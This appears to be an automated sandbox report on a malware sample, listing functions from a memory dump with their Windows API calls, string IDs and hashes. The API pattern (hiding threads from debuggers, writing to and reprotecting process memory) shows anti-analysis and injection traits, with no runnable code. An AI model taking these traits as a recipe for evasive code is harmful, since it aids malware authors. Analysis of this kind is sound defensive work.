                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E$E
                                        • API String ID: 3569954152-2119090816
                                        • Opcode ID: bb9e50f8b57dc3447aa232a3f05152a80ac23e4d5fb26227a80f87d7a8457225
                                        • Instruction ID: ab10816ed21d871db28e08260a620a268bb0cba79fb43133491b1630359332b6
                                        • Opcode Fuzzy Hash: bb9e50f8b57dc3447aa232a3f05152a80ac23e4d5fb26227a80f87d7a8457225
                                        • Instruction Fuzzy Hash: DB711970280389AFFBE15F24CC917ED3AA6EF05364F940169EF459A9D0C7B998C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F086A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • EnumWindows.USER32(020F08F0,?,00000000,?,?), ref: 020F08A0
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: EnumInformationThreadWindows
                                        • String ID: 1.!T
                                        • API String ID: 1954852945-3147410236
                                        • Opcode ID: eef05801a50469905bc6cfee8c832db116b630dd7ae5949c7073e03b5562bf7a
                                        • Instruction ID: 5d512613843d6f24239446dee8fd397fdf6618a8968e2140ea23bd82073811d9
                                        • Opcode Fuzzy Hash: eef05801a50469905bc6cfee8c832db116b630dd7ae5949c7073e03b5562bf7a
                                        • Instruction Fuzzy Hash: 8E51DC70A843419BFBA0AA388C607DE3FA78F02364F98422EDF915B9C2D775C842D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3B40, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E$E
                                        • API String ID: 3569954152-2119090816
                                        • Opcode ID: b4554684d149da544028421c7c7ce8bd7b18c2bb75f58bc57cb1a3d164aa2e94
                                        • Instruction ID: fed414a5347ef05f8b6755d738ed8ab5561c71939dd297f89b202461af8bd383
                                        • Opcode Fuzzy Hash: b4554684d149da544028421c7c7ce8bd7b18c2bb75f58bc57cb1a3d164aa2e94
                                        • Instruction Fuzzy Hash: 285113702807896FFFE65F24CC957ED3AA6AF01324F940069EF859A5D0C7B998C8E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F090E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadThread
                                        • String ID: 1.!T$E
                                        • API String ID: 543350213-2221997632
                                        • Opcode ID: 0e49210ece57848688cec00927643b70329f90dabc800b21ab025f00adbcc9cf
                                        • Instruction ID: 89af1cfa6e7a8fa9c3c97c617a1e83e57fb786c195561b257f55f2e00ce76972
                                        • Opcode Fuzzy Hash: 0e49210ece57848688cec00927643b70329f90dabc800b21ab025f00adbcc9cf
                                        • Instruction Fuzzy Hash: 90519E70A847855BFB619A384C507DD7FA65F02398FEC026EDFA51B9C2D769C842C342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F097E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadThread
                                        • String ID: 1.!T$E
                                        • API String ID: 543350213-2221997632
                                        • Opcode ID: 98f19adc5af3332bad8dfe21bc75380f5d1a7d545fd608520795aaedc92e72e6
                                        • Instruction ID: a2f853d2b85f52df5fafe44d84a8915332cd1ac299c36dbd5a75ae3bb8638225
                                        • Opcode Fuzzy Hash: 98f19adc5af3332bad8dfe21bc75380f5d1a7d545fd608520795aaedc92e72e6
                                        • Instruction Fuzzy Hash: 4D419C70A887855BFB619A344C513DD7F665F02398FEC026EDFA51F8C2E7658842D342
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F09CD, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID: 1.!T$f
                                        • API String ID: 4046476035-639078194
                                        • Opcode ID: 5a170ca9818eacd61f2151d6ad246fa69e22f81811425da89e8ca5761cb3c760
                                        • Instruction ID: bc23ce6d225f5ecccb200692b97169455af684e883ba7235038f47df62c3feab
                                        • Opcode Fuzzy Hash: 5a170ca9818eacd61f2151d6ad246fa69e22f81811425da89e8ca5761cb3c760
                                        • Instruction Fuzzy Hash: 49415A64A48BC45BFBA1DA744C503DD7FA65F02358F9C02AECFA51F8C2D7698842D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F89EB, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 458nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                          • Part of subcall function 020F91CF: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,020F8B7B,00000040,020F09FC,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 020F91E8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                        • String ID: 1.!T
                                        • API String ID: 449006233-3147410236
                                        • Opcode ID: fe6a282b795f62638ab6116dde90b4ada9387e62e26898ae84096d3e52f5a0d6
                                        • Instruction ID: 7039b5c456a07bb08bdb34b74bb819ca3d9613a06cf10648fd27bddb80c1f5c2
                                        • Opcode Fuzzy Hash: fe6a282b795f62638ab6116dde90b4ada9387e62e26898ae84096d3e52f5a0d6
                                        • Instruction Fuzzy Hash: 86F18D70A843459FDFA5DA3888947ED7BD29F12320F84826EDF924FAD6D3358482D712
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F36F7, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 317nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: d08e75631bcedd75ea9ffe2fb2042f296f9c2daebd78b3c40095f4b2455d4908
                                        • Instruction ID: 3405f29ea15926bbb8d3117bf1eed92258cb894450c1b44855559d0f012999ed
                                        • Opcode Fuzzy Hash: d08e75631bcedd75ea9ffe2fb2042f296f9c2daebd78b3c40095f4b2455d4908
                                        • Instruction Fuzzy Hash: 90A138B0280389AFFBE15F24CD56BEE3AA6EF41354F544168EF459B9C0C3B99884E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3744, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 304nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 8c390b93075926d8209d41bd3879efa5d6e427e6d0870f5295a850f6281a1dc9
                                        • Instruction ID: e8811ec096e96ea8dd6772a3475d25b6417ec85aa21be5af22a789c9ceca584b
                                        • Opcode Fuzzy Hash: 8c390b93075926d8209d41bd3879efa5d6e427e6d0870f5295a850f6281a1dc9
                                        • Instruction Fuzzy Hash: A6A15AB0280389AFFBE15F24CC55BEE3AA6EF01354F544169EF45979D0C3B98884E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F37A1, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 288nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 49778b9a4cdf2047a6bf2a3c6fe9f2155f3a2cb1358661ba6f313af01f23254f
                                        • Instruction ID: f8f7a4f800ae17203f3b148f0076b95ca283006bca65ad2d9eeae19522200541
                                        • Opcode Fuzzy Hash: 49778b9a4cdf2047a6bf2a3c6fe9f2155f3a2cb1358661ba6f313af01f23254f
                                        • Instruction Fuzzy Hash: 78A12AB0280389AFEBE15F24CD957EE3AA6EF01354F944169EF45979D0C3B98884E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0D81, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 283nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID: E
                                        • API String ID: 1761224837-3568589458
                                        • Opcode ID: 1b947a6e9b90dac2c0ffdfca418a656b059ad0f6636033f7a95cf9c9c46c0dc1
                                        • Instruction ID: 32e3331e385e3821e800e4c0dea25e748185242f0ef32a00e46aa39096bef922
                                        • Opcode Fuzzy Hash: 1b947a6e9b90dac2c0ffdfca418a656b059ad0f6636033f7a95cf9c9c46c0dc1
                                        • Instruction Fuzzy Hash: D3819E20AC4345E6EFF6196449A83FE229B5F823A0F68412ACF5697CC5D76AC4C5E903
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F37EC, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: 72158b2249e29dfc887dbf8dff09be818791970695eb7b394962695e80269b26
                                        • Instruction ID: d1a70b36fb90fc5e7b37bc45a4fda214d5ab12ed23607e98ed6953dc339fbf26
                                        • Opcode Fuzzy Hash: 72158b2249e29dfc887dbf8dff09be818791970695eb7b394962695e80269b26
                                        • Instruction Fuzzy Hash: 4A9129B0280389AFEBE15F24CD957ED3AA6EF01364F944169EF45979D0C3B988C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F38E4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 274COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 8ce7a20a9d64e8c33eb2c03cc49b19e4189ca564a2a1227d8e3f6cba597431dc
                                        • Instruction ID: 9465d203094491205e6043c9d19e75deb0b7a35f43922d85baa2ee0a5970aba4
                                        • Opcode Fuzzy Hash: 8ce7a20a9d64e8c33eb2c03cc49b19e4189ca564a2a1227d8e3f6cba597431dc
                                        • Instruction Fuzzy Hash: F3913BB028438AAFEFE21F24CC957ED36A2EF01364F554169EF45979D0C3B98888E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0DE0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 271COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: 369c5e57bedc3581112196d7b2d0a8214c081d1f7c7ed0471f13f1aa0ef8f355
                                        • Instruction ID: 42e3151dcbc6642a9c651141f33af41c315c5db8125ca6a20bc99d6fd6fe59b0
                                        • Opcode Fuzzy Hash: 369c5e57bedc3581112196d7b2d0a8214c081d1f7c7ed0471f13f1aa0ef8f355
                                        • Instruction Fuzzy Hash: 32819C30AC4345E6EFF615644CA83FE229B5F82360F68412ACF5697CC1D76A84C5EA03
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F3828, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: d963c209e561ed18a2eda0c097137c9d1e7bd0601b72c2f8aa88fbbe954a5495
                                        • Instruction ID: 4dfd2330df207b7857be82faff7fbacdfe6f8bde247955be723bdf1785eb92d0
                                        • Opcode Fuzzy Hash: d963c209e561ed18a2eda0c097137c9d1e7bd0601b72c2f8aa88fbbe954a5495
                                        • Instruction Fuzzy Hash: 049128B0280789AFEBE15F24CC957ED3AA6EF02354F944169EF459B9D0C3B988C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0E55, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 264nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID: E
                                        • API String ID: 1761224837-3568589458
                                        • Opcode ID: 819f9262bfba34c4bd94c481775baf25a3d373dab6698e64c072f587d30d7725
                                        • Instruction ID: dca4ab6b3626980f457056c69a10d6e4ac49f402989ea7a7caf8b7b860ea256c
                                        • Opcode Fuzzy Hash: 819f9262bfba34c4bd94c481775baf25a3d373dab6698e64c072f587d30d7725
                                        • Instruction Fuzzy Hash: 7F718C20AC4345E6EFF615744CA83EE269B5F82360F68412ECF5697DC1D76A84C5EA02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F38F0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadMemoryVirtualWrite
                                        • String ID: E
                                        • API String ID: 3569954152-3568589458
                                        • Opcode ID: a5437fe7d27a44955896b5cf9bd4e0e7017af5656efa19da76438c572703089c
                                        • Instruction ID: 11f40887fdae93fd31e657e8729f605d0c60440b4d256f932a5ce7d40357ba13
                                        • Opcode Fuzzy Hash: a5437fe7d27a44955896b5cf9bd4e0e7017af5656efa19da76438c572703089c
                                        • Instruction Fuzzy Hash: BC812970280389AFEBE15F24CC957ED3AA6EF01364F944169EF45979D0C3B998C4EB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0EB1, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 249nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID: E
                                        • API String ID: 1761224837-3568589458
                                        • Opcode ID: 46f45bebfd7e4809805db59ba8bf7e36a2b42c48b7356056297b3529117c0c7d
                                        • Instruction ID: 01dfae10da926e633ae403c9508f32877b140361c3f260f3a10095653d4f31eb
                                        • Opcode Fuzzy Hash: 46f45bebfd7e4809805db59ba8bf7e36a2b42c48b7356056297b3529117c0c7d
                                        • Instruction Fuzzy Hash: 2671AD30AC4345E6EFF615644CA83FE229B5F833A0F68412ACF4A97CC1D7AA84C5E502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0EF6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 244nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationLibraryLoadProcessTerminateThread
                                        • String ID: E
                                        • API String ID: 1761224837-3568589458
                                        • Opcode ID: 1d3f951fac8cfae540e4121a344942b624e7691d89648689acc86f8b0a2802a5
                                        • Instruction ID: e7d388bb00b9f6f4c0627f520d043a4d7bcdd92b256bb48c77bdcb7266919482
                                        • Opcode Fuzzy Hash: 1d3f951fac8cfae540e4121a344942b624e7691d89648689acc86f8b0a2802a5
                                        • Instruction Fuzzy Hash: D861BE30AC4345E6FFF615644DA83FE269B5F823A0F68412EDF4A97CC1D7AA84C5E502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F395C, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 239COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: E
                                        • API String ID: 0-3568589458
                                        • Opcode ID: c2269000e29dfcc084cb23209a03763e606ac2047e16b0ca53b638631f455e88
                                        • Instruction ID: 9cafee85d973979fd3d1f6ad96779d138cb46a2bbe3b006a379ffb02cd5275b6
                                        • Opcode Fuzzy Hash: c2269000e29dfcc084cb23209a03763e606ac2047e16b0ca53b638631f455e88
                                        • Instruction Fuzzy Hash: 2B8128B0284789AFEBE15F24CC917ED3AA6EF01364F940169EF859B5D0C3B988C4E741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0F55, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                          • Part of subcall function 020F6DE7: LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoadProcessTerminate
                                        • String ID: E
                                        • API String ID: 3349790660-3568589458
                                        • Opcode ID: 6f5867954ae4c770ae8e102ea6249847177794e5b7978cca792ae223678efca1
                                        • Instruction ID: 3ca2be2f5fd45ce15b2932378c4fe97a71fa396a5ee3e0f31c0ed888e3807f3a
                                        • Opcode Fuzzy Hash: 6f5867954ae4c770ae8e102ea6249847177794e5b7978cca792ae223678efca1
                                        • Instruction Fuzzy Hash: D061D130AC4345E6EFF615244DA83FE629B5F83360F68412ECF5A97CC1D76A84C5EA02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F451B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 222nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID: 1.!T
                                        • API String ID: 4046476035-3147410236
                                        • Opcode ID: 5d1a79ed53a8ff1d12fba28291724833246a0fb2241ca0b29fce6a29f35ee731
                                        • Instruction ID: dd3b71200cd13623b09fdbe19cc9ae09441e9a52814e787b9404938353438c54
                                        • Opcode Fuzzy Hash: 5d1a79ed53a8ff1d12fba28291724833246a0fb2241ca0b29fce6a29f35ee731
                                        • Instruction Fuzzy Hash: 4E61D170B843019FFB909E64CC907DE7BA69F02368F94426ADF515B9D2D765C842D702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0FA7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 212COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: d705a7f1fc8efc13cdda47ac0ea3b0702aca8f096e775ef814bd00f17f966144
                                        • Instruction ID: 99d80cec440523b4d7f46842de89c1134060bdd9e3299ada654681594c6d5b80
                                        • Opcode Fuzzy Hash: d705a7f1fc8efc13cdda47ac0ea3b0702aca8f096e775ef814bd00f17f966144
                                        • Instruction Fuzzy Hash: 5451BE30AC4341E6EFF615244CA83FE269B5F837A0F68422EDF5A97CC1D76A84C5E502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0FEC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: a409522cc25c198fa73d95ab168e68d243efc7ba8ab91e4cb21f673838030626
                                        • Instruction ID: cb57054da46b72e3c79164d18712216355c01009a2e0e83f3a2a31e5ab976b02
                                        • Opcode Fuzzy Hash: a409522cc25c198fa73d95ab168e68d243efc7ba8ab91e4cb21f673838030626
                                        • Instruction Fuzzy Hash: 8C51CE20AC4345E6EFF615244CA83FE669B5F437A0F68422ECF5A97CC0D76A84C5E502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F1039, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 188COMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,?,?,?,?,?,?,?), ref: 020F41CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: ProcessTerminate
                                        • String ID: E
                                        • API String ID: 560597551-3568589458
                                        • Opcode ID: d13ddb7d8fe33c080b0870937e83e6476ec5d3d5dd35393d8ae43a0e9153860b
                                        • Instruction ID: e16cd48bc2d6e7f8f59ae02c86bccb2c711034799c887ea95a4a365cd20f6c64
                                        • Opcode Fuzzy Hash: d13ddb7d8fe33c080b0870937e83e6476ec5d3d5dd35393d8ae43a0e9153860b
                                        • Instruction Fuzzy Hash: 1051AD20A84385EAEFF615244DAC3EE66975F433A0F68422ECF5A97CC1D76A84C5E502
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0D0F, Relevance: 3.7, APIs: 2, Instructions: 686nativethreadCOMMON
                                        Download Yara Rule
